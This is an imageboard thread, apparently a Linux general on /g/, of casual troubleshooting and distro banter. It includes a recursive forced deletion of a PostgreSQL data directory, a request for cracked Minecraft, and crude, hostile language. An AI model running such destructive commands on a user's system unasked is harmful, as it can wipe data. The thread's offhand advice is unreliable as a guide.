>>64707138
Distro, that comes with preinstalled kernel-dev tools and yet lightweight
>>64707153
Maybe. Is DVD-version a meme?
>>
>>64707057
Thanks will try that
>>
>>64707132
I am not entirely sure you know how this works man
>>
>>64706997
So bold to claim Mint is shitty, yet you can't even figure out a simple problem like that... kinda gets your noggin joggin...
>>
>>64706166
Slackware. Only thing more complex than that would be Linux from Scratch or Lunar Linux
>>
File: screenfetch-opensuse.png (62 KB, 877x413)
62 KB
62 KB PNG
>>64692548
Alright lads Ill just admit my brainlet status on Linux from the get-go.
Just installed openSUSE on a VM and plan on partitioning my hard drive for dual boot. Where do I go from here? Rather, I should ask, what should I do next to make myself a proficient user or at least know what I'm doing?

Pic related is not mine, just a pic of the screenfetch
>>
thoughts on mailspring as an email client?
>>
>>64707729
Also, forgot to add.
A colleague of mine recommended that I start from a terminal/text rather than getting right into the GUI. Is this good advice? He said it has its benefits in server management at the very least
>>
Does Fedora have something equivalent to the driver discovery tool in Ubuntu?
>>
File: 1517448076644.png (156 KB, 270x270)
156 KB
156 KB PNG
>/glmg/
/g/ finally found a way to shill alpine
>>
Never forget Unity

Rest in Pepperoni
>>
currently installing fedora 27 kde spin
what am I in for?
>>
Is it just a given that the more "corporate" an application looks the shittier it's made?
Installed an email application and it's running 5 different background processes, one of which is called "emptyWindow"...
>>
>>64707922
decent solid distro and best DE tbfh
>>
>>64707911
Unity was always a shit

>>64707835
Start with a GUI. Life in CLI is very tedious for the mundane tasks (word processing, shitposting, trap porn)

>>64707973
Yes, but it's not a law of nature yet. Corporate stuff is uglier, just like irl.
>>
>>64707973
Pretty much. All that kind of software is basically just Frankenstein applications.
>why write my own version of this 1 little function when I can import a massive framework that already has that function in it instead?
>>
>>64707922
>dubs of 2
>>64707977
>57:22, dubs of 2 in the timestamp, followed by dubs of 7
impossible to go wrong with this
>>
>>64701299
encrypt the disk or just the volumes that have worth a shit data and then wipe it. cant recover what u cant un encrypt
>>
>>64706376
Found out the issue isn't event related to the HDD.
It also occurs when I just copy the kernel from flash memory to sdram.

https://pastebin.com/raw/8qUg0Jv3
>>
>>64706461
Thanks for proving my point.
>>
>>64704528
Show df -h. Also >>64704554 this
>>
>>64708205
Alright I solved it,
Either I'm not copying the entire image, or data surrounding the image caused the CRC to fail. If I copy the entire 4M flash to ram and the point it to the kernel it works fine.
>>
>>64699178
I've been using Slackware for 5 years, it's the only distro I can tolerate using, and I fear for the day Volkerding dies. Also, nice Afterstep. I loved Window Maker to death for years but I had to let it o because software developers are cocksuckers and they don't know how to write software that works on a variety of WMs.
>>
I've been using Mint (Cinnamon) on my laptop for a year and I like it, but I would now like to try a general-use distro more likely to be secure and less buggy. Is there anything I should know before diving into Debian and installing Cinnamon?
>>
What is a good power managment tool?
>>
>people unironically switch distros primarily because they disagree ideologically with the bootloader
>>
>>64708875
i have the same question as you. also have mint but mate , feels good but when i ran android studio it keeps freezing . dont know what to do .
>>
>>64708875
Debian packages the MATE desktop, which is rock solid and performs well. I ran Debian+MATE as my work desktop for years.
>>
File: 53.png (325 KB, 462x500)
325 KB
325 KB PNG
Why has no one made a GNU distro that would boot straight into emacs yet?
>>
>>64708952
tlp is bretty gud

>>64709593
replace your login shell with emacs
>>
>>64709616
You can also static link emacs and use it as an init binary.
>>
Can anyone help me out on installing oracle linux? Is the only way to do it without via USB to do a network download? Also, the oracle software page thing gives like 5 ISO's for each version, I don't know what the fuck to do. I've tried booting from USB but it never finds the needed files or whatever.
>>
So I installed i3 on kubuntu and when I tried to logout I got a blank white screen. I have to force shutdown my laptop. What to do?
>>
Why aren't these threads friendly?
>>
>>64709752
>>>/g/sqt
>>
>>64709692
Why do you need/want Oracle Linux over another RHEL rebuild like CentOS?
>>
>>64707882
underrated post
>>
>>64710232
It's for a Database Administration class. The professor said CentOS would be fine too but that he preferred we would work with Oracle Linux. I guess the only differences are that it already comes with some binaries that we're going to use.

I don't know why it's such a pain in the ass, apparently to burn the ISO to an USB you need to run a script on a machine already running Oracle Linux?? I don't have a DVD nor can I get one at the moment and I need it installed by today.
>>
How would I go about making the top bar for this program (Evince, Gnome document viewer) skinny? When I installed it on my laptop the top bar was pretty compact. But for some reason on my desktop the top bar is really fat.
>>
>>64710401
Change your Gtk3 theme.
>>
>>64709717
Remove i3, install xfce.
>>
>>64709717
alt+prtscn+reisub
>busier backwards.
>>
>try to initdb for postgres
>shit's broken as fuck, whatever work around its 50 bugs
>it managed to create a broken db on PGDATA that pg_ctl won't recognize
>it refuses to write over it
>no problem I'll just `rm` it
>`sudo rm -rf /var/lib/postgresql/*`
>it's still there
>try again
>rm is literally doing nothing
>rm isn't an alias
>the rm binary is what it should be and isn't a weird symlink or something
WHAT
THE
FUCK
HOW FUCK IS IT ALLOWED FOR RM TO NOT DO ITS FUCKING JOB
HOLY FUCKING SHIT
There's not even an error message or anything, it just doesn't do anything
What am I supposed to do now? Write a fucking python script to remove it? Send help.
>>
>>64710434
That doesn't seem to be doing much when I use lxappearance. I am wondering if I have to change my gtk.css or something.
>>
>>64710519
lxappearance is gtk2 by default.
>>
>>64710490
Your filesystem is broken.
>>
>>64710341
Just go with CentOS then. Oracle Linux is very obscure.

>>64710466
personally I never got that magic spell to work
>>
File: 1495375255152.jpg (64 KB, 772x501)
64 KB
64 KB JPG
>spend 2 hours trying to get wireless networking to work on arch install
>reboot for the first time and it works immediately
>>
File: testing.png (172 KB, 1024x768)
172 KB
172 KB PNG
is it safe to use autoremove to delete these random packages?
>>
>>64710736
Those are KDE libraries and an old kernel so probably.
>>
>>64710825
yeah I had the KDE Konsole installed as well for some reason and deleted it. Don't know how or why it got there
>>
After I update my kernel I can't seem to mount usb sticks until I reboot. Is there a way to fix this? I've not
>>
>>64711748
*I've not tried manually mounting, this is just using my file manager because I'm lazy
>>
Somehow every time i want to know something about systemd i'm not able to find that in google and i'm too lazy to read it's man.
How do i save a session and stop it from terminal when guis button don't work? i found kill and terminate session in loginctl help, but none of them saves opened windows, at least for me in kde.
How do i start a new session on new vt if display manager fails? Could i use multiple display managers for that, so when gui dm fails i can use the cli one?
>>
>>64710691
What software are you using to manage your networks? Did a fresh install of Arch today and everytime i reboot my laptop i have to dhcpcd the interface to get my connection working, help anybody
>>
>>64712516
Also, system tray icons got missing somehow, icons for like USB drives networking just dissapeard
>>
File: missing icons.png (171 KB, 1366x768)
171 KB
171 KB PNG
>>64712598
forgot pic
>>
>>64696203
> MS _basic_ data
> 165G
Is this what Windows 11 will be like?
>>
Just installed CentOS but now I can't boot into my windows partition because apparently I need to move the boot files at the start of the disk...

I don't have time to burn an ISO and go to Window's command line, is there anything I can do from Linux to solve this shit?
>>
>>64713101
>because apparently I need to move the boot files at the start of the disk...
Where did you get this information? You can only have 1 active bootloader and the Windows bootloader is shit and will lock you out of centos.

You're supposed to use GRUB as your bootloader when dual booting, and you most likely already overwrote the windows bootloader with GRUB during the installation. That's the correct setup. I'm not sure why GRUB isn't displaying an option for you to boot into windows though. But that's the issue you should be searching for. How to make sure Windows appears in GRUB on a dual boot.
>>
>>64710585

No it isn't. It sets both 2 and 3 themes. Stop spreading misinformation.

>>64710401

You edit the theme or use a global theme override with specific CSS targetting the header-bar padding.
>>
How would I go about and set my display to 144hz? 144hz option doesn't even show up for the 1080p monitor.
$ xrandr
Screen 0: minimum 320 x 200, current 3840 x 1200, maximum 16384 x 16384
DisplayPort-0 disconnected (normal left inverted right x axis y axis)
DisplayPort-1 connected 1920x1200+0+0 (normal left inverted right x axis y axis) 518mm x 324mm
1920x1200 59.95*+
1920x1080 60.00
1600x1200 60.00
1680x1050 59.95
1280x1024 60.02
1440x900 59.95
1280x960 60.00
1280x800 59.95
1280x720 59.95
1024x768 60.00
800x600 60.32
640x480 59.94
720x400 70.08
HDMI-A-0 disconnected (normal left inverted right x axis y axis)
HDMI-A-1 disconnected (normal left inverted right x axis y axis)
DVI-D-0 connected primary 1920x1080+1920+0 (normal left inverted right x axis y axis) 531mm x 298mm
1920x1080 60.00*+ 59.94
1680x1050 60.00
1280x1024 75.02 60.02
1280x800 60.00
1152x864 75.00
1280x720 60.00
1024x768 119.99 75.03 60.00
832x624 74.55
800x600 119.97 75.00 60.32
640x480 119.99 75.00 60.00 59.94
720x400 70.08
$
>>
>>64714170
Running amd.
>>
I am fucking retarded or how do I enable the kpti patch for my kernel? Updated sources and recompiled already
>>
>>64714170
add a new modeline, like how you would add one for a new resolution, except set the refresh rate in the new modeline to 144Hz.
Tutorials for adding a new res modeline are a web search away.
>>
Is there a way to sandbox a several programs together? I want to put csgo on my Debian machine so that i dont need to dual boot anymore but i dont want closed source code on this machine, so im at a bit of a dilemma
>>
>>64714320
You can create a chroot and run them from there.
>>
>>64714265
Got a new mode from '$ gtf 1920 1080 144'
Added it.
$ xrandr --newmode "1920x1080_144.00"  451.72  1920 2080 2296 2672  1080 1081 1084 1174  -HSync +Vsync

Activating is giving me:
xrandr: Configure crtc 0 failed
>>
>>64714427
well fug, looks like the driver you use for your vga card is the one which has problems with the res, not just xrandr not detecting it.
>>
>have Dell Vostro 3300
>try installing Fedora KDE because I like KDE on my other laptop (HP)
>doesn't boot after installing official Nvidia drivers
>Kubuntu has glitching on Firefox when watching Youtube
>Only distro that works without problems is Ubuntu LTS
For fucks sake
>>
>>64714519
>Only distro that works without problems is Ubuntu LTS

Install KDE Neon.
Ships with latest KDE and based on Ubuntu LTS
>>
>>64714546
I'll try it again I guess. Only thing I didn't like was how it's basically just Kubuntu, so why not just use Kubuntu LTS.
I mean the KDE version doesn't matter that much to me. Ever since 5.8 KDE has been great tbqh, newer versions don't add much noticeable improvement..
>>
>>64714479
Alright. Thanks for the pointers.
I'll look into drivers later.
>>
>page 7
GNU/Bump
>>
How to read systemd's logs from a system without systemd? I have two different distros installed and one of them decided that it didn't want to live anymore
>>
File: le binary log face.jpg (2.71 MB, 3456x2304)
2.71 MB
2.71 MB JPG
>>64716202
Try to chroot into the other system and see if it works.
>>
>>64716202

>how do i read a file on a computer where i don't have a tool which can read those files?
That's your retarded logic. Your retarded logic is going to say that "plain text" files don't have that problem without realizing that it does, it's just that you have programs which can read the text files (most likely utf-8 encoded files).
>>
Tfw too dumbo for pipe :(
>>
>>64716235
Why are you so angry? >>64716235 this was a sensible answer, pointing me to a tool that could read it would be a sensible answer, going on a sand in vagina (male)-tier rant on me for no good reason is not; that's just rude
>>
>>64716513

journalctl
>>
should I use base-devel or just base when installing arch?
>>
>>64716681

Did you try reading what it actually is?
>>
>>64716681
You most likely will want to compile some stuff yourself and install software from the aur, so base-devel would probably be a good idea. You can still install it later at any time though using pacman.
>>
File: IMG_20180213_133135.jpg (1.65 MB, 3200x2400)
1.65 MB
1.65 MB JPG
For the love of God, how I can fix this?
>>
>>64716968
Install Xenocara.
>>
>>64716968
missing suitable DDX drivers I think
>>
>>64717010
>>64717020

>installed crux
>all xorg things
>nvidia card
>nouveau installed
>nouveau on xorg config
>does not start

Basically that
>>
File: minecraft.jpg (448 KB, 1200x630)
448 KB
448 KB JPG
>>64692548
Hi, I want to get minecraft for free on linux mint, does anybody know how to do that?

Is it just to install the cracked version? I have a crack on my other pc I could move with an USB to my linux one.
>>
>>64716968
figure out what that 3rd line ("bad display name..") means
>>
>>64716306
>make your own non-standard format
>blame everything else for not supplying tools to read it
>>
new

>>64717681

>>64717681

>>64717681
>>
New thread:
>>64717688
>>64717688
>>64717688
>>
>>64717684
Fuck off, commie.
>>
>>64717689
>>64717691
delet
>>
>>64692548
what is so bad about systemd?

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.